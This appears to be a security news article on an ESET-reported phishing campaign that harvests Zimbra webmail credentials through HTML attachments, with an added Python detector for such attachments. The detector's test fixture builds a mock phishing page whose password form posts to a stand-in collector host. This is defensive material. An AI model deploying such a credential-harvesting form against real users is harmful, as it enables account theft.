ESET researchers have recently identified a broad phishing campaign with the objective of gathering credentials from Zimbra account users.
Zimbra Collaboration is an open-core collaborative software platform that has established itself as a sought-after alternative to many mainstream enterprise email platforms.
Details on the Zimbra Phishing Efforts
This campaign has been active since April 2023 and shows no signs of abating. Its primary targets include a diverse range of small to medium-sized enterprises, as well as governmental institutions.
Data from ESET’s telemetry indicates that Poland hosts the majority of these targets. Nevertheless, users in other European nations, including Ukraine, Italy, France, and the Netherlands, have been affected as well. Similarly, several countries in Latin America have reported cases, with Ecuador leading in the number of detections.
Though this campaign may not exhibit high technical intricacy, it has effectively breached organizations using Zimbra Collaboration.
Adversaries benefit from the fact that HTML attachments often contain genuine code. The only distinguishing malicious element is typically a link redirecting to a malicious host. This method proves more elusive to reputation-based antispam measures compared to common phishing techniques, where malicious links are embedded directly within the email text. ESET’s Viktor Šperka, the researcher behind the campaign’s discovery, offered these insights.
Šperka also noted the diverse range of targeted organizations, highlighting that the sole commonality among victims is their use of Zimbra. Given that Zimbra Collaboration tends to be popular with organizations operating on tighter IT budgets, it remains a lucrative target for attackers.
Chronology of the Attack
Initially, a target will receive an email containing an attached phishing page. This email typically alerts the recipient about updates related to the email server, possible account deactivation, or similar concerns, urging the user to open the attachment.
Upon opening the attachment, the user is shown a counterfeit Zimbra login page tailored to mirror the branding of the targeted organization. Any credentials entered are captured from the HTML form and transmitted to an attacker-controlled server, which in turn grants the attacker potential access to the compromised email account.
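The attack chain above rests on one detectable property: a login form shipped as an HTML attachment whose form action (or inline script) points at a host other than the organization's own webmail server. The following Python script is an added illustration of how a mail gateway or incident responder could flag such attachments; it is not ESET's or Zimbra's code. The trusted host name, the collector host and the sample message are all constructed for the example, and the script uses only the Python standard library.

```python
"""Flag HTML e-mail attachments whose forms or scripts send data to hosts
other than the organisation's own webmail server.  Added illustration, not
ESET's or Zimbra's code; host names and the sample message are constructed."""
import email
import re
from email import policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed: the only host a legitimate login form should ever submit to.
TRUSTED_HOSTS = {"mail.example-org.test"}

URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)


class LoginFormParser(HTMLParser):
    """Collect form actions, password fields and URLs found inside scripts."""

    def __init__(self):
        super().__init__()
        self.form_actions = []
        self.password_fields = 0
        self.script_urls = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_fields += 1
        elif tag == "script":
            self._in_script = True
            if a.get("src"):
                self.script_urls.append(a["src"])

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.script_urls.extend(URL_RE.findall(data))


def host_of(url: str) -> str:
    """Lower-cased host part of url; '' for relative URLs (same-origin submit)."""
    return urlparse(url).hostname or ""


def analyse_html(html: str, trusted_hosts=TRUSTED_HOSTS) -> list:
    """Return findings for one HTML document; an empty list means nothing suspicious."""
    parser = LoginFormParser()
    parser.feed(html)
    findings = []
    for action in parser.form_actions:
        host = host_of(action)
        if host and host not in trusted_hosts:
            findings.append(f"form posts to external host {host}")
    for url in parser.script_urls:
        host = host_of(url)
        if host and host not in trusted_hosts:
            findings.append(f"script references external host {host}")
    # A password field plus an external destination is the credential-harvesting pattern.
    if parser.password_fields and findings:
        findings.insert(0, "credential form with external destination")
    return findings


def scan_message(raw: bytes, trusted_hosts=TRUSTED_HOSTS) -> dict:
    """Map each suspicious HTML attachment's filename to its list of findings."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    results = {}
    for part in msg.iter_attachments():
        name = part.get_filename() or "<unnamed>"
        is_html = part.get_content_type() == "text/html" or name.lower().endswith((".html", ".htm"))
        if not is_html:
            continue
        body = (part.get_payload(decode=True) or b"").decode("utf-8", "replace")
        findings = analyse_html(body, trusted_hosts)
        if findings:
            results[name] = findings
    return results


def build_sample_message() -> bytes:
    """Constructed sample mirroring the lure: a 'server update' notice with an HTML attachment."""
    msg = EmailMessage()
    msg["From"] = "postmaster@example-org.test"
    msg["To"] = "user@example-org.test"
    msg["Subject"] = "Mail server update - action required"
    msg.set_content("Please open the attached page to keep your mailbox active.")
    html = (
        "<html><body><h1>Webmail sign-in</h1>"
        '<form method="post" action="https://collector.example/login">'
        '<input name="username"><input type="password" name="password">'
        "</form></body></html>"
    )
    msg.add_attachment(html, subtype="html", filename="update.html")
    return msg.as_bytes()


if __name__ == "__main__":
    for filename, findings in scan_message(build_sample_message()).items():
        print(filename)
        for finding in findings:
            print("  -", finding)
```

The check deliberately treats a relative form action as benign, since a page hosted on the organization's own server legitimately submits to itself; what it flags is exactly the combination the campaign relies on, a password field whose data leaves for a host the organization does not control. Running the script on the constructed sample reports `update.html` with a credential form posting to `collector.example`.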
There’s a substantial possibility that attackers successfully breached some administrator accounts, subsequently establishing new mailboxes. These new mailboxes might then be utilized to dispatch phishing emails to additional potential victims. While ESET’s observations indicate the campaign primarily leans on social engineering and user interaction, future strategies might diverge.